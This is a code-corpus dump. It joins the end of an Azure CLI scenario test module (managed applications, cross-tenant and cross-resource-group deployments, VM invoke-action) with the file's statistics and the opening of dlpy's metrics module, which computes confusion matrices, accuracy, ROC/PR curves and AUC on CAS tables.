            self.check('artifacts[0].name', 'ApplicationResourceTemplate'),
            self.check('artifacts[0].type', 'Template'),
            self.check('artifacts[1].name', 'CreateUiDefinition'),
            self.check('artifacts[1].type', 'Custom')
        ])

        self.cmd('managedapp definition delete -g {rg} -n {adn}')
        self.cmd('managedapp definition list -g {rg}', checks=self.is_empty())

        # clean up the temporary test user and its role assignment
        self.cmd('role assignment delete --assignee {upn} --role contributor ')
        self.cmd('ad user delete --upn-or-object-id {upn}')
class ManagedAppScenarioTest(ScenarioTest):
    """Tests for 'az managedapp' create/list/show/delete."""

    @AllowLargeResponse()
    @ResourceGroupPreparer()
    def test_managedapp(self, resource_group):
        """Create a service-catalog managed application from a definition and verify it round-trips."""
        self.kwargs.update({
            'upn': self.create_random_name('testuser', 15) + '@azuresdkteam.onmicrosoft.com',
            'sub': self.get_subscription_id()
        })

        user_principal = self.cmd('ad user create --display-name tester123 --password Test123456789 --user-principal-name {upn}').get_output_in_json()
        time.sleep(15)  # By-design, it takes some time for RBAC system propagated with graph object change
        # deterministic guids so the role assignment can be recorded/played back
        with mock.patch('azure.cli.command_modules.role.custom._gen_guid', side_effect=self.create_guid):
            role_assignment = self.cmd('role assignment create --assignee {upn} --role contributor --scope "/subscriptions/{sub}" ').get_output_in_json()
        from msrestazure.tools import parse_resource_id
        role_definition_id = parse_resource_id(role_assignment['roleDefinitionId'])['name']

        self.kwargs.update({
            'loc': 'westcentralus',
            'adn': 'testappdefname',
            'addn': 'test_appdef_123',
            'ad_desc': 'test_appdef_123',
            'uri': 'https://github.com/Azure/azure-managedapp-samples/raw/master/Managed%20Application%20Sample%20Packages/201-managed-storage-account/managedstorage.zip',
            # authorization is '<principal id>:<role definition id>'
            'auth': user_principal['objectId'] + ':' + role_definition_id,
            'lock': 'None',
            'rg': resource_group
        })

        self.kwargs['ad_id'] = self.cmd('managedapp definition create -n {adn} --package-file-uri {uri} --display-name {addn} --description {ad_desc} -l {loc} -a {auth} --lock-level {lock} -g {rg}').get_output_in_json()['id']

        # create a managedapp
        self.kwargs.update({
            'man': 'mymanagedapp',
            'ma_loc': 'westcentralus',
            'ma_kind': 'servicecatalog',
            'ma_rg': self.create_random_name('climanagedapp', 25),
            'param': '\'{\"storageAccountNamePrefix\": {\"value\": \"mytest\"}, \"storageAccountType\": {\"value\": \"Standard_LRS\"}}\''
        })
        self.kwargs['ma_rg_id'] = '/subscriptions/{sub}/resourceGroups/{ma_rg}'.format(**self.kwargs)

        self.kwargs['ma_id'] = self.cmd('managedapp create -n {man} -g {rg} -l {ma_loc} --kind {ma_kind} -m {ma_rg_id} -d {ad_id} --parameters {param} --tags "key=val" ', checks=[
            self.check('name', '{man}'),
            self.check('type', 'Microsoft.Solutions/applications'),
            self.check('kind', 'servicecatalog'),
            self.check('managedResourceGroupId', '{ma_rg_id}'),
            self.check('tags', {'key': 'val'})
        ]).get_output_in_json()['id']

        self.cmd('managedapp list -g {rg}', checks=self.check('[0].name', '{man}'))

        self.cmd('managedapp show --ids {ma_id}', checks=[
            self.check('name', '{man}'),
            self.check('type', 'Microsoft.Solutions/applications'),
            self.check('kind', 'servicecatalog'),
            self.check('managedResourceGroupId', '{ma_rg_id}')
        ])

        self.cmd('managedapp delete -g {rg} -n {man}')
        self.cmd('managedapp list -g {rg}', checks=self.is_empty())

        # clean up the temporary test user and its role assignment
        self.cmd('role assignment delete --assignee {upn} --role contributor ')
        self.cmd('ad user delete --upn-or-object-id {upn}')
class CrossRGDeploymentScenarioTest(ScenarioTest):
    """Scenario test for an ARM group deployment whose template targets a second resource group."""

    @ResourceGroupPreparer(name_prefix='cli_test_cross_rg_alt', parameter_name='resource_group_cross')
    @ResourceGroupPreparer(name_prefix='cli_test_cross_rg_deploy')
    def test_group_deployment_crossrg(self, resource_group, resource_group_cross):
        # The deployment template lives next to this test module.
        template_dir = os.path.dirname(os.path.realpath(__file__))
        self.kwargs.update({
            'rg1': resource_group,
            'rg2': resource_group_cross,
            'tf': os.path.join(template_dir, 'crossrg_deploy.json').replace('\\', '\\\\'),
            'dn': self.create_random_name('azure-cli-crossrgdeployment', 40),
            'sa1': create_random_name(prefix='crossrg'),
            'sa2': create_random_name(prefix='crossrg'),
        })
        # Validation passes when the secondary resource group really exists ...
        self.cmd('group deployment validate -g {rg1} --template-file "{tf}" --parameters CrossRg={rg2} StorageAccountName1={sa1} StorageAccountName2={sa2}',
                 checks=[self.check('properties.provisioningState', 'Succeeded')])
        # ... and fails when it does not.
        with self.assertRaises(CLIError):
            self.cmd('group deployment validate -g {rg1} --template-file "{tf}" --parameters CrossRg=SomeRandomRG StorageAccountName1={sa1} StorageAccountName2={sa2}')
        self.cmd('group deployment create -g {rg1} -n {dn} --template-file "{tf}" --parameters CrossRg={rg2}',
                 checks=[
                     self.check('properties.provisioningState', 'Succeeded'),
                     self.check('resourceGroup', '{rg1}'),
                 ])
        self.cmd('group deployment list -g {rg1}',
                 checks=[
                     self.check('[0].name', '{dn}'),
                     self.check('[0].resourceGroup', '{rg1}'),
                 ])
        self.cmd('group deployment show -g {rg1} -n {dn}',
                 checks=[
                     self.check('name', '{dn}'),
                     self.check('resourceGroup', '{rg1}'),
                 ])
        # The deployment is expected to produce exactly three operations.
        self.cmd('group deployment operation list -g {rg1} -n {dn}',
                 checks=[
                     self.check('length([])', 3),
                     self.check('[0].resourceGroup', '{rg1}'),
                 ])
class CrossTenantDeploymentScenarioTest(LiveScenarioTest):
    """Live tests for deployments that reference a Shared Image Gallery image in an auxiliary tenant.

    Both test methods run the identical scenario; they differ only in the CLI
    command group exercised ('group deployment' vs 'deployment group').  The
    shared steps are factored into private helpers so the two stay in sync.
    """

    def _prepare_nic(self, resource_group):
        """Create VNET/NSG/public-IP and a NIC in the test subscription; stores 'nic_id' in kwargs."""
        self.kwargs.update({
            'vm_rg': resource_group,
            'vnet': 'clivmVNET',
            'subnet': 'clivmSubnet',
            'nsg': 'clivmNSG',
            'ip': 'clivmPublicIp',
            'nic': 'clivmVMNic'
        })
        self.cmd('network vnet create -n {vnet} -g {vm_rg} --subnet-name {subnet}')
        self.cmd('network nsg create -n {nsg} -g {vm_rg}')
        self.cmd('network public-ip create -n {ip} -g {vm_rg} --allocation-method Dynamic')
        res = self.cmd('network nic create -n {nic} -g {vm_rg} --subnet {subnet} --vnet {vnet} --network-security-group {nsg} --public-ip-address {ip}').get_output_in_json()
        self.kwargs.update({
            'nic_id': res['NewNIC']['id']
        })

    def _prepare_sig_in_aux_tenant(self):
        """Build a generalized VM image and a SIG image version in the auxiliary tenant; stores 'sig_id' in kwargs."""
        self.kwargs.update({
            'location': 'eastus',
            'vm': self.create_random_name('cli_crosstenantvm', 40),
            'gallery': self.create_random_name('cli_crosstenantgallery', 40),
            'image': self.create_random_name('cli_crosstenantimage', 40),
            'version': '1.1.2',
            'captured': self.create_random_name('cli_crosstenantmanagedimage', 40),
            'aux_sub': '1c638cf4-608f-4ee6-b680-c329e824c3a8',
            'rg': self.create_random_name('cli_test_cross_tenant_rg', 40),
            'aux_tenant': '72f988bf-86f1-41af-91ab-2d7cd011db47'
        })
        self.cmd('group create -g {rg} --location {location} --subscription {aux_sub}',
                 checks=self.check('name', self.kwargs['rg']))
        self.cmd('sig create -g {rg} --gallery-name {gallery} --subscription {aux_sub}', checks=self.check('name', self.kwargs['gallery']))
        self.cmd('sig image-definition create -g {rg} --gallery-name {gallery} --gallery-image-definition {image} --os-type linux -p publisher1 -f offer1 -s sku1 --subscription {aux_sub}',
                 checks=self.check('name', self.kwargs['image']))
        self.cmd('sig image-definition show -g {rg} --gallery-name {gallery} --gallery-image-definition {image} --subscription {aux_sub}',
                 checks=self.check('name', self.kwargs['image']))
        self.cmd('vm create -g {rg} -n {vm} --image ubuntults --admin-username clitest1 --generate-ssh-key --subscription {aux_sub}')
        # Deprovision the VM asynchronously, then wait for it to finish before deallocating.
        self.cmd(
            'vm run-command invoke -g {rg} -n {vm} --command-id RunShellScript --scripts "echo \'sudo waagent -deprovision+user --force\' | at -M now + 1 minutes" --subscription {aux_sub}')
        time.sleep(70)
        self.cmd('vm deallocate -g {rg} -n {vm} --subscription {aux_sub}')
        self.cmd('vm generalize -g {rg} -n {vm} --subscription {aux_sub}')
        self.cmd('image create -g {rg} -n {captured} --source {vm} --subscription {aux_sub}')
        res = self.cmd(
            'sig image-version create -g {rg} --gallery-name {gallery} --gallery-image-definition {image} --gallery-image-version {version} --managed-image {captured} --replica-count 1 --subscription {aux_sub}').get_output_in_json()
        self.kwargs.update({
            'sig_id': res['id']
        })

    def _deploy_and_verify(self, base):
        """Validate, then deploy/list/show with every supported auxiliary-credential flag combination.

        base is the command prefix: 'group deployment' or 'deployment group'.
        """
        curr_dir = os.path.dirname(os.path.realpath(__file__))
        self.kwargs.update({
            'tf': os.path.join(curr_dir, 'crosstenant_vm_deploy.json').replace('\\', '\\\\'),
            'dn': self.create_random_name('cli-crosstenantdeployment', 40),
            'dn1': self.create_random_name('cli-crosstenantdeployment1', 40),
            'dn2': self.create_random_name('cli-crosstenantdeployment2', 40),
            'dn3': self.create_random_name('cli-crosstenantdeployment3', 40)
        })
        self.cmd(base + ' validate -g {vm_rg} --template-file "{tf}" --parameters SIG_ImageVersion_id={sig_id} NIC_id={nic_id}', checks=[
            self.check('properties.provisioningState', 'Succeeded')
        ])
        # Each variant pairs a deployment name with one way of passing aux credentials.
        variants = [
            ('dn', '--aux-subs "{aux_sub}"'),
            ('dn1', '--aux-tenants "{aux_tenant}"'),
            ('dn2', '--aux-subs "{aux_sub}" -j'),
            ('dn3', '--aux-tenants "{aux_tenant}" -j'),
        ]
        for name_key, aux_args in variants:
            self.cmd(base + ' create -g {vm_rg} -n {' + name_key + '} --template-file "{tf}" --parameters SIG_ImageVersion_id={sig_id} NIC_id={nic_id} ' + aux_args, checks=[
                self.check('properties.provisioningState', 'Succeeded'),
                self.check('resourceGroup', '{vm_rg}')
            ])
            self.cmd(base + ' list -g {vm_rg}', checks=[
                self.check('[0].name', '{' + name_key + '}'),
                self.check('[0].resourceGroup', '{vm_rg}')
            ])
            self.cmd(base + ' show -g {vm_rg} -n {' + name_key + '}', checks=[
                self.check('name', '{' + name_key + '}'),
                self.check('resourceGroup', '{vm_rg}')
            ])
        # Supplying both --aux-subs and --aux-tenants at once is rejected.
        with self.assertRaises(AssertionError):
            self.cmd(base + ' create -g {vm_rg} -n {dn} --template-file "{tf}" --parameters SIG_ImageVersion_id={sig_id} NIC_id={nic_id} --aux-tenants "{aux_tenant}" --aux-subs "{aux_sub}"')

    @ResourceGroupPreparer(name_prefix='cli_test_cross_tenant_deploy', location='eastus')
    def test_group_deployment_cross_tenant(self, resource_group):
        self._prepare_nic(resource_group)
        self._prepare_sig_in_aux_tenant()
        self._deploy_and_verify('group deployment')

    @ResourceGroupPreparer(name_prefix='cli_test_deployment_group_cross_tenant', location='eastus')
    def test_deployment_group_cross_tenant(self, resource_group):
        self._prepare_nic(resource_group)
        self._prepare_sig_in_aux_tenant()
        self._deploy_and_verify('deployment group')
class InvokeActionTest(ScenarioTest):
    """Exercise `resource invoke-action` against a VM via the generic resource command."""

    @ResourceGroupPreparer(name_prefix='cli_test_invoke_action')
    def test_invoke_action(self, resource_group):
        self.kwargs.update({
            'vm': self.create_random_name('cli-test-vm', 30),
            'user': 'ubuntu',
            'pass': self.create_random_name('Longpassword#1', 30)
        })
        vm_info = self.cmd('vm create -g {rg} -n {vm} --use-unmanaged-disk --image UbuntuLTS --admin-username {user} --admin-password {pass} --authentication-type password --nsg-rule None').get_output_in_json()
        self.kwargs['vm_id'] = vm_info['id']
        # Parameterless actions, invoked in the order required to capture a VM.
        for action in ('powerOff', 'generalize', 'deallocate'):
            self.cmd('resource invoke-action --action ' + action + ' --ids {vm_id}')
        # `capture` takes a JSON request body (backslash-escaped for the shell).
        self.kwargs['request_body'] = '{\\"vhdPrefix\\":\\"myPrefix\\",\\"destinationContainerName\\":\\"container\\",\\"overwriteVhds\\":\\"true\\"}'
        self.cmd('resource invoke-action --action capture --ids {vm_id} --request-body {request_body}')
class GlobalIdsScenarioTest(ScenarioTest):
    """Verify that --ids takes precedence over explicitly supplied scope arguments."""

    @ResourceGroupPreparer(name_prefix='cli_test_global_ids')
    def test_global_ids(self, resource_group):
        self.kwargs['vnet'] = 'vnet1'
        vnet_info = self.cmd('network vnet create -g {rg} -n {vnet}').get_output_in_json()
        self.kwargs['vnet_id'] = vnet_info['newVNet']['id']
        # command will fail if the other parameters were actually used
        self.cmd('network vnet show --subscription fakesub --resource-group fakerg -n fakevnet --ids {vnet_id}')
class ResourceGroupLocalContextScenarioTest(LocalContextScenarioTest):
    """Verify that `group create/show/delete` honor the persisted local context."""

    def test_resource_group_local_context(self):
        self.kwargs.update({
            'group1': 'test_local_context_group_1',
            'group2': 'test_local_context_group_2',
            'location': 'eastasia'
        })
        # Creating a group should record its name/location in the local context.
        self.cmd('group create -n {group1} -l {location}', checks=[
            self.check('name', self.kwargs['group1']),
            self.check('location', self.kwargs['location'])
        ])
        # `group show` without -n resolves the name from the local context.
        self.cmd('group show', checks=[
            self.check('name', self.kwargs['group1']),
            self.check('location', self.kwargs['location'])
        ])
        # `group delete` must not infer the name; it is expected to exit with code 2.
        # NOTE: assertRaisesRegexp is a deprecated alias removed in Python 3.12;
        # use assertRaisesRegex instead.
        with self.assertRaisesRegex(SystemExit, '2'):
            self.cmd('group delete')
        self.cmd('group delete -n {group1} -y')
        # A subsequent create without -l reuses the location from the local context.
        self.cmd('group create -n {group2}', checks=[
            self.check('name', self.kwargs['group2']),
            self.check('location', self.kwargs['location'])
        ])
        self.cmd('group delete -n {group2} -y')
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
| 53.200062
| 473
| 0.62384
| 19,778
| 172,049
| 5.251947
| 0.048741
| 0.038817
| 0.043322
| 0.025416
| 0.851521
| 0.821157
| 0.776766
| 0.741588
| 0.711321
| 0.684028
| 0
| 0.009829
| 0.209952
| 172,049
| 3,233
| 474
| 53.216517
| 0.754353
| 0.032822
| 0
| 0.632382
| 0
| 0.079148
| 0.437922
| 0.127753
| 0
| 0
| 0
| 0
| 0.029731
| 1
| 0.036963
| false
| 0.002411
| 0.007634
| 0
| 0.060667
| 0.002411
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0ad65e62c831e21cea3d4b4e06d2a132c008f0af
| 46,020
|
py
|
Python
|
dlpy/metrics.py
|
arharvey918/python-dlpy
|
423985ebe65acbcbe9a7996bb26aee5e66eddc49
|
[
"Apache-2.0"
] | 1
|
2018-08-27T15:10:11.000Z
|
2018-08-27T15:10:11.000Z
|
dlpy/metrics.py
|
arharvey918/python-dlpy
|
423985ebe65acbcbe9a7996bb26aee5e66eddc49
|
[
"Apache-2.0"
] | null | null | null |
dlpy/metrics.py
|
arharvey918/python-dlpy
|
423985ebe65acbcbe9a7996bb26aee5e66eddc49
|
[
"Apache-2.0"
] | 1
|
2019-09-19T15:59:26.000Z
|
2019-09-19T15:59:26.000Z
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
''' Evaluation metrics for classification and regression tasks '''
from .utils import random_name
from swat.cas.table import CASColumn
from swat.cas.table import CASTable
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import warnings
def confusion_matrix(y_true, y_pred, castable=None, labels=None, id_vars=None):
    '''
    Computes the confusion matrix of a classification task.

    Parameters
    ----------
    y_true : string or :class:`CASColumn`
        The column of the ground truth labels. If it is a string, then
        y_pred has to be a string and they both belong to the same CASTable
        specified by the castable argument. If it is a :class:`CASColumn`,
        then y_pred has to be a :class:`CASColumn`, and the castable argument
        is ignored. When both y_pred and y_true are :class:`CASColumn`,
        they can be in different CASTables.
    y_pred : string or :class:`CASColumn`
        The column of the predicted class labels. Same string/CASColumn
        pairing rules as y_true.
    castable : :class:`CASTable`, optional
        The CASTable object to use as the source if the y_pred and y_true
        are strings.
        Default = None
    labels : list, optional
        List of class labels used to reorder the matrix or to select a
        subset of it. Selection is by label value (the matrix index), not
        by integer position. If ``labels=None``, all labels are included.
        Default = None
    id_vars : string or list of strings, optional
        Column names that serve as unique id for y_true and y_pred if they
        are from different CASTables. The column names need to appear in
        both CASTables, and they serve to match y_true and y_pred
        appropriately, since observation orders can be shuffled in a
        distributed computing environment.
        Default = None

    Returns
    -------
    :class:`pandas.DataFrame`
        The column index is the predicted class labels.
        The row index is the ground truth class labels.
    '''
    check_results = _check_inputs(y_true, y_pred, castable=castable,
                                  return_target_dtype=True, id_vars=id_vars)
    y_true = check_results[0]
    y_pred = check_results[1]
    castable = check_results[2]
    conn = check_results[3]
    tmp_table_created = check_results[4]
    target_dtype = check_results[5]

    res = castable.retrieve('crosstab',
                            _messagelevel='error',
                            row=y_true, col=y_pred)
    conf_mat = res['Crosstab']
    # The crosstab result is not necessarily square: collect the class
    # labels appearing on the rows and on the columns, and take their union
    # so the final matrix is symmetric in shape.
    row_class = [x.strip() for x in conf_mat.iloc[:, 0].values]
    col_class = [conf_mat.colinfo[x].label for x in conf_mat.columns.values][1:]
    cls_list = sorted(set(row_class).union(col_class))
    # Fill the full matrix; class pairs never observed stay at zero.
    ret = np.zeros((len(cls_list), len(cls_list)))
    for i, row in conf_mat.iterrows():
        irow = cls_list.index(row.iloc[0].strip())
        for j, col in enumerate(conf_mat.iloc[i, 1:]):
            icol = cls_list.index(col_class[j])
            ret[int(irow), int(icol)] = col
    conf_mat = pd.DataFrame(data=ret, columns=cls_list, index=cls_list)
    # Name the index after the ground-truth column.
    conf_mat.index.names = [y_true]
    # Restore the index dtype to match the target column's CAS dtype.
    if target_dtype == 'double':
        target_index_dtype = np.float64
    elif target_dtype.startswith('int'):
        target_index_dtype = getattr(np, target_dtype)
    else:
        target_index_dtype = 'str'
    conf_mat.index = conf_mat.index.astype(target_index_dtype)

    if tmp_table_created:
        # _check_inputs created a temporary table; drop it now that we are done.
        conn.retrieve('table.droptable', _messagelevel='error', name=castable.name)

    if labels is None:
        return conf_mat
    if not isinstance(labels, list):
        labels = [labels]
    # Select/reorder by label value: .loc matches the documented semantics
    # (the previous .iloc call only accepted integer positions).
    return conf_mat.loc[labels, labels]
def accuracy_score(y_true, y_pred, castable=None, normalize=True, id_vars=None):
    '''
    Computes the classification accuracy score.

    Parameters
    ----------
    y_true : string or :class:`CASColumn`
        The column of the ground truth labels. If it is a string, then
        y_pred has to be a string and they both belong to the same CASTable
        specified by the castable argument. If it is a :class:`CASColumn`,
        then y_pred has to be a :class:`CASColumn`, and the castable
        argument is ignored. When both y_pred and y_true are
        :class:`CASColumn`, they can be in different CASTables.
    y_pred : string or :class:`CASColumn`
        The column of the predicted class labels. Same string/CASColumn
        pairing rules as y_true.
    castable : :class:`CASTable`, optional
        The CASTable object to use as the source if the y_pred and y_true
        are strings.
        Default = None
    normalize : boolean, optional
        If ``False``, return the number of correctly classified samples.
        Otherwise, return the fraction of correctly classified samples.
        Default = True
    id_vars : string or list of strings, optional
        Column names that serve as unique id for y_true and y_pred if they
        are from different CASTables; used to match observations, since row
        order can be shuffled in a distributed computing environment.
        Default = None

    Returns
    -------
    score : float
        If ``normalize=False``, the number of correctly classified samples.
        Otherwise, the fraction of correctly classified samples.
    '''
    checked = _check_inputs(y_true, y_pred, castable=castable,
                            return_target_dtype=False, id_vars=id_vars)
    y_true = checked[0]
    y_pred = checked[1]
    castable = checked[2]
    conn = checked[3]
    tmp_table_created = checked[4]

    # Derive the accuracy from the confusion matrix: correct predictions
    # are exactly the diagonal entries.
    conf_mat = confusion_matrix(y_true, y_pred, castable=castable, id_vars=id_vars)
    total_obs = conf_mat.values.sum()
    correct_obs = np.trace(conf_mat.values)
    score = correct_obs / total_obs if normalize else correct_obs

    if tmp_table_created:
        # _check_inputs created a temporary table; drop it now that we are done.
        conn.retrieve('table.droptable', _messagelevel='error', name=castable.name)
    return score
def plot_roc(y_true, y_score, pos_label, castable=None, cutstep=0.001,
             figsize=(8, 8), fontsize_spec=None, linewidth=1, id_vars=None):
    '''
    Plot the receiver operating characteristic (ROC) curve for binary
    classification tasks.

    Parameters
    ----------
    y_true : string or :class:`CASColumn`
        The column of the ground truth labels. If it is a string, then
        y_score has to be a string and they both belong to the same CASTable
        specified by the castable argument. If it is a :class:`CASColumn`,
        then y_score has to be a :class:`CASColumn`, and the castable
        argument is ignored. When both are :class:`CASColumn`, they can be
        in different CASTables.
    y_score : string or :class:`CASColumn`
        The column of estimated probability for the positive class.
        Same string/CASColumn pairing rules as y_true.
    pos_label : string, int or float
        The positive class label.
    castable : :class:`CASTable`, optional
        The CASTable object to use as the source if y_score and y_true are
        strings.
        Default = None
    cutstep : float > 0 and < 1, optional
        The stepsize of threshold cutoffs.
        Default = 0.001
    figsize : tuple, optional
        The size of the generated figure.
        Default = (8, 8)
    fontsize_spec : dict, optional
        Overrides for the fontsize of 'xlabel', 'ylabel', 'xtick', 'ytick'
        and 'title' (e.g. {'xlabel':14, 'ylabel':14}). Unspecified entries
        fall back to {'xlabel':16, 'ylabel':16, 'xtick':14, 'ytick':14,
        'title':20}.
        Default = None
    linewidth : float, optional
        The line width of the ROC curve.
        Default = 1
    id_vars : string or list of strings, optional
        Column names that serve as unique id for y_true and y_score if they
        are from different CASTables; used to match observations, since row
        order can be shuffled in a distributed computing environment.
        Default = None

    Returns
    -------
    :class:`matplotlib.axes.Axes`
        The x-axis is the false positive rate and the y-axis is the true
        positive rate.
    '''
    fontsize = {'xlabel': 16, 'ylabel': 16, 'xtick': 14,
                'ytick': 14, 'title': 20}
    if fontsize_spec is not None:
        fontsize.update(fontsize_spec)
    if not isinstance(pos_label, str):
        pos_label = str(pos_label)

    checked = _check_inputs(y_true, y_score, castable=castable,
                            return_target_dtype=False, id_vars=id_vars)
    y_true = checked[0]
    y_score = checked[1]
    castable = checked[2]
    conn = checked[3]
    tmp_table_created = checked[4]

    # percentile.assess computes sensitivity/FPR over the threshold cutoffs.
    conn.retrieve('loadactionset', _messagelevel='error', actionset='percentile')
    res = conn.retrieve('percentile.assess', _messagelevel='error',
                        table=castable,
                        inputs=y_score, response=y_true,
                        event=pos_label, cutstep=cutstep)
    if tmp_table_created:
        # _check_inputs created a temporary table; drop it now that we are done.
        conn.retrieve('table.droptable', _messagelevel='error', name=castable.name)

    rocinfo = res['ROCInfo']
    # Append the (0, 0) endpoint so the curve reaches the origin.
    fpr = list(rocinfo.FPR) + [0]
    tpr = list(rocinfo.Sensitivity) + [0]

    fig, ax = plt.subplots(1, 1, figsize=figsize)
    ax.plot(fpr, tpr, linestyle='-', linewidth=linewidth)
    ax.set_ylim([-0.01, 1.01])
    ax.set_xlim([-0.01, 1.01])
    # Chance-level diagonal for reference.
    ax.plot([0, 1], [0, 1], linestyle='--', linewidth=linewidth)
    ax.set_xlabel('False Positive Rate', fontsize=fontsize['xlabel'])
    ax.set_ylabel('True Positive Rate', fontsize=fontsize['ylabel'])
    ax.get_xaxis().set_tick_params(direction='out', labelsize=fontsize['xtick'])
    ax.get_yaxis().set_tick_params(direction='out', labelsize=fontsize['ytick'])
    ax.set_title('ROC curve', fontsize=fontsize['title'])
    return ax
def plot_precision_recall(y_true, y_score, pos_label, castable=None, cutstep=0.001,
                          figsize=(8, 8), fontsize_spec=None, linewidth=1, id_vars=None):
    '''
    Plot the precision-recall (PR) curve for binary classification tasks.

    Parameters
    ----------
    y_true : string or :class:`CASColumn`
        The column of the ground truth labels. If it is a string, then
        y_score has to be a string and they both belong to the same CASTable
        specified by the castable argument. If it is a :class:`CASColumn`,
        then y_score has to be a :class:`CASColumn`, and the castable
        argument is ignored. When both are :class:`CASColumn`, they can be
        in different CASTables.
    y_score : string or :class:`CASColumn`
        The column of estimated probability for the positive class.
        Same string/CASColumn pairing rules as y_true.
    pos_label : string, int or float
        The positive class label.
    castable : :class:`CASTable`, optional
        The CASTable object to use as the source if y_score and y_true are
        strings.
        Default = None
    cutstep : float > 0 and < 1, optional
        The stepsize of threshold cutoffs.
        Default = 0.001
    figsize : tuple, optional
        The size of the generated figure.
        Default = (8, 8)
    fontsize_spec : dict, optional
        Overrides for the fontsize of 'xlabel', 'ylabel', 'xtick', 'ytick'
        and 'title' (e.g. {'xlabel':14, 'ylabel':14}). Unspecified entries
        fall back to {'xlabel':16, 'ylabel':16, 'xtick':14, 'ytick':14,
        'title':20}.
        Default = None
    linewidth : float, optional
        The line width of the PR curve.
        Default = 1
    id_vars : string or list of strings, optional
        Column names that serve as unique id for y_true and y_score if they
        are from different CASTables; used to match observations, since row
        order can be shuffled in a distributed computing environment.
        Default = None

    Returns
    -------
    :class:`matplotlib.axes.Axes`
        The x-axis is the recall (sensitivity) and the y-axis is the
        precision.
    '''
    fontsize = {'xlabel': 16, 'ylabel': 16, 'xtick': 14,
                'ytick': 14, 'title': 20}
    if fontsize_spec is not None:
        fontsize.update(fontsize_spec)
    if not isinstance(pos_label, str):
        pos_label = str(pos_label)

    checked = _check_inputs(y_true, y_score, castable=castable,
                            return_target_dtype=False, id_vars=id_vars)
    y_true = checked[0]
    y_score = checked[1]
    castable = checked[2]
    conn = checked[3]
    tmp_table_created = checked[4]

    # percentile.assess computes sensitivity/FDR over the threshold cutoffs.
    conn.retrieve('loadactionset', _messagelevel='error', actionset='percentile')
    res = conn.retrieve('percentile.assess', _messagelevel='error',
                        table=castable,
                        inputs=y_score, response=y_true,
                        event=pos_label, cutstep=cutstep)
    if tmp_table_created:
        # _check_inputs created a temporary table; drop it now that we are done.
        conn.retrieve('table.droptable', _messagelevel='error', name=castable.name)

    rocinfo = res['ROCInfo']
    # FDR is undefined when TP + FP == 0; define it as 0 there so the
    # corresponding precision becomes 1.
    rocinfo.loc[rocinfo.TP + rocinfo.FP == 0, 'FDR'] = 0
    fdr = list(rocinfo.FDR) + [0]
    precision = [1 - x for x in fdr]
    recall = list(rocinfo.Sensitivity) + [0]

    fig, ax = plt.subplots(1, 1, figsize=figsize)
    ax.plot(recall, precision, linestyle='-', linewidth=linewidth)
    ax.set_ylim([-0.01, 1.01])
    ax.set_xlim([-0.01, 1.01])
    ax.set_xlabel('Recall', fontsize=fontsize['xlabel'])
    ax.set_ylabel('Precision', fontsize=fontsize['ylabel'])
    ax.get_xaxis().set_tick_params(direction='out', labelsize=fontsize['xtick'])
    ax.get_yaxis().set_tick_params(direction='out', labelsize=fontsize['ytick'])
    ax.set_title('Precision-Recall curve', fontsize=fontsize['title'])
    return ax
def roc_auc_score(y_true, y_score, pos_label, castable=None, cutstep=0.001, id_vars=None):
    '''
    Compute the area under the receiver operating characteristic (ROC)
    curve for a binary classification task.

    Parameters
    ----------
    y_true : string or :class:`CASColumn`
        The column of ground truth labels. When it is a string, y_score
        must also be a string and both columns must belong to the CASTable
        given by ``castable``. When it is a :class:`CASColumn`, y_score
        must also be a :class:`CASColumn` (possibly from a different
        CASTable) and the ``castable`` argument is ignored.
    y_score : string or :class:`CASColumn`
        The column of estimated probabilities for the positive class,
        following the same typing rules as y_true.
    pos_label : string, int or float
        The positive class label.
    castable : :class:`CASTable`, optional
        Source table used when y_true and y_score are strings.
        Default = None
    cutstep : float > 0 and < 1, optional
        The step size of the threshold cutoffs.
        Default = 0.001
    id_vars : string or list of strings, optional
        Column names serving as a unique id to match y_true and y_score
        when they come from different CASTables, since observation order
        is not guaranteed in a distributed computing environment.
        Default = None

    Returns
    -------
    score : float
    '''
    # The assess action expects the event level as a string.
    if not isinstance(pos_label, str):
        pos_label = str(pos_label)
    (y_true, y_score, castable,
     conn, tmp_table_created) = _check_inputs(y_true, y_score, castable=castable,
                                              return_target_dtype=False,
                                              id_vars=id_vars)
    conn.retrieve('loadactionset', _messagelevel='error', actionset='percentile')
    res = conn.retrieve('percentile.assess', _messagelevel='error',
                        table=castable, inputs=y_score, response=y_true,
                        event=pos_label, cutstep=cutstep)
    # _check_inputs may have created a temporary merged table; drop it.
    if tmp_table_created:
        conn.retrieve('table.droptable', _messagelevel='error', name=castable.name)
    # The C statistic reported by percentile.assess is the ROC AUC.
    return res['ROCInfo'].C.loc[0]
def average_precision_score(y_true, y_score, pos_label, castable=None, cutstep=0.001,
                            interpolate=False, id_vars=None):
    '''
    Compute the average precision score for a binary classification task.

    Parameters
    ----------
    y_true : string or :class:`CASColumn`
        The column of ground truth labels. When it is a string, y_score
        must also be a string and both columns must belong to the CASTable
        given by ``castable``. When it is a :class:`CASColumn`, y_score
        must also be a :class:`CASColumn` (possibly from a different
        CASTable) and the ``castable`` argument is ignored.
    y_score : string or :class:`CASColumn`
        The column of estimated probabilities for the positive class,
        following the same typing rules as y_true.
    pos_label : string, int or float
        The positive class label.
    castable : :class:`CASTable`, optional
        Source table used when y_true and y_score are strings.
        Default = None
    cutstep : float > 0 and < 1, optional
        The step size of the threshold cutoffs.
        Default = 0.001
    interpolate : boolean, optional
        If ``interpolate=True``, the score is the area under the
        precision-recall curve with linear interpolation. Otherwise it
        follows the step-wise definition used by scikit-learn:
        https://scikit-learn.org/stable/modules/generated/sklearn.metrics.average_precision_score.html
    id_vars : string or list of strings, optional
        Column names serving as a unique id to match y_true and y_score
